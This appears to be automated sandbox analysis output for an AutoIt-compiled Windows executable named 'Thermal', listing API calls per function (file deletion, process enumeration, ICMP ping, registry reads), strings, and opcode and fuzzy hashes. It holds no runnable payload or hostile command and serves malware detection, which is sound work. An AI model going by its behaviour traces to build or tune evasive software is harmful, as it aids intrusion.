                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00183D96
                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00183E3E
                                                      • MoveFileW.KERNEL32(?,?), ref: 00183E51
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00183E6E
                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00183E90
                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00183EAC
                                                      Similarity
                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 4002782344-1173974218
                                                      • Opcode ID: 9429dd34161c76886f4a26f271f061c47f10482d3d599b4c8e8123f0c6e2cc57
                                                      • Instruction ID: 9aefde694be692a78d224c643de8a904f85c11f38b31ac7985cf247ebc2c488a
                                                      • Opcode Fuzzy Hash: 9429dd34161c76886f4a26f271f061c47f10482d3d599b4c8e8123f0c6e2cc57
                                                      • Instruction Fuzzy Hash: 3B51603180115DAACF15FBE0CA929EEB779AF25301F644269E452B7192EF316F09CF60
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 00135D40
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                      • GetCurrentProcess.KERNEL32(?,001B0A18,00000000,00000000,?), ref: 00135E07
                                                      • IsWow64Process.KERNEL32(00000000), ref: 00135E0E
                                                      • GetNativeSystemInfo.KERNEL32(00000000), ref: 00135E54
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00135E5F
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00135E90
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00135E9C
                                                      Similarity
                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                      • String ID:
                                                      • API String ID: 1986165174-0
                                                      • Opcode ID: bdff1134fbf08ea6a661f352aab8b4fb9f60ca65c802670a2b70ff9eece7023b
                                                      • Instruction ID: 87fd7b1108728943f8869a1722c9f4a001feef6f5d64fbde9fdd3b6f1a5bd7a3
                                                      • Opcode Fuzzy Hash: bdff1134fbf08ea6a661f352aab8b4fb9f60ca65c802670a2b70ff9eece7023b
                                                      • Instruction Fuzzy Hash: 58919031549BC0DEC735CB6884505ABFFF66F2A700F984AAED0CA97A41D320A648C769
                                                      APIs
                                                        • Part of subcall function 00140284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00132A58,?,00008000), ref: 001402A4
                                                        • Part of subcall function 00184FEC: GetFileAttributesW.KERNEL32(?,00183BFE), ref: 00184FED
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0018407C
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 001840CC
                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 001840DD
                                                      • FindClose.KERNEL32(00000000), ref: 001840F4
                                                      • FindClose.KERNEL32(00000000), ref: 001840FD
                                                      Similarity
                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 2649000838-1173974218
                                                      • Opcode ID: 62f592c88482c45c70d51d12ab651f57077abbdc2f8449f2c256873a591b5513
                                                      • Instruction ID: f4cdf421278d0d50559979183dfab6e04d54f93a5bd777445a10e297669769c9
                                                      • Opcode Fuzzy Hash: 62f592c88482c45c70d51d12ab651f57077abbdc2f8449f2c256873a591b5513
                                                      • Instruction Fuzzy Hash: E1316E31008385ABC705FB64C8959AFB7A8BFA5304F444A1DF5E582192EF20DA09CBA3
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0018416D
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0018417B
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0018419B
                                                      • CloseHandle.KERNEL32(00000000), ref: 00184245
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 420147892-0
                                                      • Opcode ID: 7c7534f80c0865d2cb1e50a963b3efdfaeccc02b49758cb15804d499fabad520
                                                      • Instruction ID: 56270a24621e1fee3b14c044215df2833af38ec5019fbe0ab60bf1f78e7c0637
                                                      • Opcode Fuzzy Hash: 7c7534f80c0865d2cb1e50a963b3efdfaeccc02b49758cb15804d499fabad520
                                                      • Instruction Fuzzy Hash: 8531B471108341AFD305EF50E885AAFBBE9BFA9350F00052DF585C21A1EF719A49CB52
                                                      APIs
                                                        • Part of subcall function 00133740: CharUpperBuffW.USER32(?,001E71DC,00000000,?,00000000,001E71DC,?,001253A5,?,?,?,?), ref: 0013375D
                                                      • _memmove.LIBCMT ref: 0012B68A
                                                      Similarity
                                                      • API ID: BuffCharUpper_memmove
                                                      • String ID:
                                                      • API String ID: 2819905725-0
                                                      • Opcode ID: e15ef58b7448866ac946596cb5d012716623ca6f2806142bb474cff24b036734
                                                      • Instruction ID: b3b727136f021b6dbe70c0259c2147812295fdfd83c46aec75efb6f27ff52919
                                                      • Opcode Fuzzy Hash: e15ef58b7448866ac946596cb5d012716623ca6f2806142bb474cff24b036734
                                                      • Instruction Fuzzy Hash: 0FA299706083519FD724CF14D480B2AB7E1FF98304F15896DE8AA8B361D771EDA5CB92
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,0016FC86), ref: 0018495A
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0018496B
                                                      • FindClose.KERNEL32(00000000), ref: 0018497B
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirst
                                                      • String ID:
                                                      • API String ID: 48322524-0
                                                      • Opcode ID: 2b5f93adcecc5115efb18e715dfe261a208ea7a6600cee521521669ba820e41e
                                                      • Instruction ID: d4e01a2edcbac36b6a68278123aacb73224542a8588f7276c9492a91852991f8
                                                      • Opcode Fuzzy Hash: 2b5f93adcecc5115efb18e715dfe261a208ea7a6600cee521521669ba820e41e
                                                      • Instruction Fuzzy Hash: B1E0DF31810606AB9224BB3CEC0D8EBB75C9F0E339F100719F835C24E0EB70DA848B96
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 415409aaa1bc5ce2c8d74f3d5140c958f6920bc11b3d524512ddbd8dac9ab42c
                                                      • Instruction ID: 2ad136b7d585df10375b3aa765bf2c0ff570b8b940398c76f58b3952e5dbaaa6
                                                      • Opcode Fuzzy Hash: 415409aaa1bc5ce2c8d74f3d5140c958f6920bc11b3d524512ddbd8dac9ab42c
                                                      • Instruction Fuzzy Hash: 4922B170A0422ADFDB14DF58E890ABEB7F0FF19310F158169E845AB351E334AD95CB91
                                                      APIs
                                                      • timeGetTime.WINMM ref: 0012BF57
                                                        • Part of subcall function 001252B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001252E6
                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 001636B5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessagePeekSleepTimetime
                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                      • API String ID: 1792118007-922114024
                                                      • Opcode ID: 58daa8c078ffa468d0ef6e8423b6f4d69728bdb2c9c58b7a31e5a7a12a15b939
                                                      • Instruction ID: ec7b75653a4d1fa9ecec9f82d59fb8da7f77bea13c3dfed498fec0997baf60b3
                                                      • Opcode Fuzzy Hash: 58daa8c078ffa468d0ef6e8423b6f4d69728bdb2c9c58b7a31e5a7a12a15b939
                                                      • Instruction Fuzzy Hash: 17C2CC70608351DFD728DF24D884BAEB7E5BF94304F14891DF59A872A1CB71E9A4CB82
                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00123444
                                                      • RegisterClassExW.USER32(00000030), ref: 0012346E
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0012347F
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 0012349C
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001234AC
                                                      • LoadIconW.USER32(000000A9), ref: 001234C2
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001234D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: ec70ee4c154d44b5b3cea98c9c1f366f9c8a24b11f4d862035186258de299d5a
                                                      • Instruction ID: 44352bf5de4e6293c692a8bf26bb1eef4a5eebd360e0573e4cb85a16d382934a
                                                      • Opcode Fuzzy Hash: ec70ee4c154d44b5b3cea98c9c1f366f9c8a24b11f4d862035186258de299d5a
                                                      • Instruction Fuzzy Hash: 66312B71844349AFEB42DFE4EC89ACEBBF0FB19310F10465AE590EA6A0D7B55581CF50
                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00123444
                                                      • RegisterClassExW.USER32(00000030), ref: 0012346E
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0012347F
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 0012349C
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001234AC
                                                      • LoadIconW.USER32(000000A9), ref: 001234C2
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001234D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: 97b863ae6a67c34c4e2f723a0d3c970c349af7708d5f2d8e4521c4149a70f1ae
                                                      • Instruction ID: 9a59052fe7d1a50dce9d4b91b0b9351a438474dcd05d0be47865e10e36adc4df
                                                      • Opcode Fuzzy Hash: 97b863ae6a67c34c4e2f723a0d3c970c349af7708d5f2d8e4521c4149a70f1ae
                                                      • Instruction Fuzzy Hash: EA21E4B1904259AFEB01DFE4EC89B9EBBF4FB08700F10421AF514AA6A0D7B15580CF91
                                                      APIs
                                                        • Part of subcall function 001400CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00133094), ref: 001400ED
                                                        • Part of subcall function 001408C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0013309F), ref: 001408E3
                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 001330E2
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001701BA
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001701FB
                                                      • RegCloseKey.ADVAPI32(?), ref: 00170239
                                                      • _wcscat.LIBCMT ref: 00170292
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                      • API String ID: 2673923337-2727554177
                                                      • Opcode ID: de96e872ea00809dac9194f12066a8763bdcfce746b9cac69630fa903f01de9c
                                                      • Instruction ID: 89ea8143eee38bfc47a4605e554e5cb5b963498680c26d980ae7f0e7676f936d
                                                      • Opcode Fuzzy Hash: de96e872ea00809dac9194f12066a8763bdcfce746b9cac69630fa903f01de9c
                                                      • Instruction Fuzzy Hash: F9715B71409742AEC305EFA5D8819AFBBF8FF58340F40452EF6499B1A1EF309988CB52
                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00135156
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00135165
                                                      • LoadIconW.USER32(00000063), ref: 0013517C
                                                      • LoadIconW.USER32(000000A4), ref: 0013518E
                                                      • LoadIconW.USER32(000000A2), ref: 001351A0
                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001351C6
                                                      • RegisterClassExW.USER32(?), ref: 0013521C
                                                        • Part of subcall function 00123411: GetSysColorBrush.USER32(0000000F), ref: 00123444
                                                        • Part of subcall function 00123411: RegisterClassExW.USER32(00000030), ref: 0012346E
                                                        • Part of subcall function 00123411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0012347F
                                                        • Part of subcall function 00123411: InitCommonControlsEx.COMCTL32(?), ref: 0012349C
                                                        • Part of subcall function 00123411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001234AC
                                                        • Part of subcall function 00123411: LoadIconW.USER32(000000A9), ref: 001234C2
                                                        • Part of subcall function 00123411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001234D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: 08865160daa94b9d04611abadcc4aacf25817be4946f2869a1598acc383420ff
                                                      • Instruction ID: 1ae3b8a6651d6c3d344e125bb37841462e137a0d06c1bad62918160225bdfb87
                                                      • Opcode Fuzzy Hash: 08865160daa94b9d04611abadcc4aacf25817be4946f2869a1598acc383420ff
                                                      • Instruction Fuzzy Hash: FD217C70D04349AFEB119FE4ED89B9EBBB4FB18710F000159F604AA6E0C7B55590CF80
                                                      APIs
                                                      • WSAStartup.WS2_32(00000101,?), ref: 00195E7E
                                                      • inet_addr.WSOCK32(?,?,?), ref: 00195EC3
                                                      • gethostbyname.WS2_32(?), ref: 00195ECF
                                                      • IcmpCreateFile.IPHLPAPI ref: 00195EDD
                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00195F4D
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00195F63
                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00195FD8
                                                      • WSACleanup.WSOCK32 ref: 00195FDE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      • Opcode ID: 078bbbe07226232d5a31f91f6d189e47c1d5a21558c42b530295ec74d73f1e34
                                                      • Instruction ID: 85003aa92b8cb31fe0661eaed9d35ea1152a2f6911dd7be3072b8f7e73ee920c
                                                      • Opcode Fuzzy Hash: 078bbbe07226232d5a31f91f6d189e47c1d5a21558c42b530295ec74d73f1e34
                                                      • Instruction Fuzzy Hash: 9C51A2316047019FDB22EF24DC49B2AB7E5EF48720F144529F999EB2A1DB70ED40CB42
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00134E22
                                                      • KillTimer.USER32(?,00000001), ref: 00134E4C
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00134E6F
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00134E7A
                                                      • CreatePopupMenu.USER32 ref: 00134E8E
                                                      • PostQuitMessage.USER32(00000000), ref: 00134EAF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 129472671-2362178303
                                                      • Opcode ID: 992076fa9541dad0ba590c3130218f05a52641774f5c74b3b142a933e515ba08
                                                      • Instruction ID: 955e5bc0d8cc5ff2fd198e1b8b05a0d70a8488faa2004be11cdc89e3572fa3ac
                                                      • Opcode Fuzzy Hash: 992076fa9541dad0ba590c3130218f05a52641774f5c74b3b142a933e515ba08
                                                      • Instruction Fuzzy Hash: 2741383120828AEBFB166F64EC4DBBF76A5F758300F040235F645965E1DB78BC909761
                                                      APIs
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00170C5B
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                      • _memset.LIBCMT ref: 00135787
                                                      • _wcscpy.LIBCMT ref: 001357DB
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001357EB
                                                      • __swprintf.LIBCMT ref: 00170CD1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                      • String ID: Line %d: $AutoIt -
                                                      • API String ID: 230667853-4094128768
                                                      • Opcode ID: 4c5d475670cae8f5711447b69efb2c4c1a081ee4063ea3323cb7c87fc265f179
                                                      • Instruction ID: d8bd69d97227e7541cd5705b907b193799f9af7a95c4c459cb23a399e4ece7af
                                                      • Opcode Fuzzy Hash: 4c5d475670cae8f5711447b69efb2c4c1a081ee4063ea3323cb7c87fc265f179
                                                      • Instruction Fuzzy Hash: CB41A571008305AAD722EB60DC85FEF77ECAF68754F10461EF189921E1EB70A649CB96
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00135109
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0013512A
                                                      • ShowWindow.USER32(00000000), ref: 0013513E
                                                      • ShowWindow.USER32(00000000), ref: 00135147
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: c8b96d42bf30c53fb7b79b423fc8e4ccbeb9b0e2a3a725e35412635fa1a9a921
                                                      • Instruction ID: b3d778b307009eb3a641c34f5cb1ee7752f1688217961dc24f627ce76caed2df
                                                      • Opcode Fuzzy Hash: c8b96d42bf30c53fb7b79b423fc8e4ccbeb9b0e2a3a725e35412635fa1a9a921
                                                      • Instruction Fuzzy Hash: 23F0B7715452957AFA222B676C88E6B7E7DD7CAF50F00011ABA04AA5A0C7611891DAB0
                                                      APIs
                                                        • Part of subcall function 00134A8C: _fseek.LIBCMT ref: 00134AA4
                                                        • Part of subcall function 00189CF1: _wcscmp.LIBCMT ref: 00189DE1
                                                        • Part of subcall function 00189CF1: _wcscmp.LIBCMT ref: 00189DF4
                                                      • _free.LIBCMT ref: 00189C5F
                                                      • _free.LIBCMT ref: 00189C66
                                                      • _free.LIBCMT ref: 00189CD1
                                                        • Part of subcall function 00142F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00149C54,00000000,00148D5D,001459C3), ref: 00142F99
                                                        • Part of subcall function 00142F85: GetLastError.KERNEL32(00000000,?,00149C54,00000000,00148D5D,001459C3), ref: 00142FAB
                                                      • _free.LIBCMT ref: 00189CD9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      Similarity
                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                      • String ID: >>>AUTOIT SCRIPT<<<
                                                      APIs
                                                      Similarity
                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                      • String ID:
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001252E6
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0012534A
                                                      • TranslateMessage.USER32(?), ref: 00125356
                                                      • DispatchMessageW.USER32(?), ref: 00125360
                                                      Similarity
                                                      • API ID: Message$Peek$DispatchTranslate
                                                      • String ID:
                                                      APIs
                                                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00121275,SwapMouseButtons,00000004,?), ref: 001212A8
                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00121275,SwapMouseButtons,00000004,?), ref: 001212C9
                                                      • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00121275,SwapMouseButtons,00000004,?), ref: 001212EB
                                                      Strings
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,001B2C4C), ref: 00183F57
                                                      • GetLastError.KERNEL32 ref: 00183F66
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00183F75
                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,001B2C4C), ref: 00183FD2
                                                      Similarity
                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                      • String ID:
                                                      APIs
                                                      • _memset.LIBCMT ref: 00135B58
                                                        • Part of subcall function 001356F8: _memset.LIBCMT ref: 00135787
                                                        • Part of subcall function 001356F8: _wcscpy.LIBCMT ref: 001357DB
                                                        • Part of subcall function 001356F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001357EB
                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00135BAD
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00135BBC
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00170D7C
                                                      Similarity
                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                      • String ID:
                                                      APIs
                                                        • Part of subcall function 001349C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,001327AF,?,00000001), ref: 001349F4
                                                      • _free.LIBCMT ref: 0016FB04
                                                      • _free.LIBCMT ref: 0016FB4B
                                                        • Part of subcall function 001329BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00132ADF
                                                      Strings
                                                      • Bad directive syntax error, xrefs: 0016FB33
                                                      Similarity
                                                      • API ID: _free$CurrentDirectoryLibraryLoad
